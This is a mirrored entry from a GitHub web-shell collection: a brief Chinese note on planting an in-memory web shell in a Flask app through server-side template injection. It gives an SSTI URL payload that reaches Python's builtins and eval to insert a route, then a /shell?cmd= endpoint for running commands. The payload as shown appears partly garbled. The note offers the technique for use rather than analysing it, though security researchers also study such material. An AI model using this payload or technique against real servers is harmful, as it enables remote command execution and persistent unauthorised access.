mirror of
https://github.com/tennc/webshell
synced 2024-11-29 06:30:20 +00:00
8b5b371da4
from : https://github.com/jweny/MemShellDemo/blob/master/MemShellForPython/python%20flask%20%E5%86%85%E5%AD%98%E9%A9%AC.md
633 B
633 B
先起一个带有ssti的flask:
插入路由:
http://127.0.0.1:8000/test?param={{url_for.globals[%27__builtins__%27]%27eval%27}}
访问植入的shell: http://127.0.0.1:8000/shell?cmd=whoami
参考:
https://github.com/iceyhexman/flask_memory_shell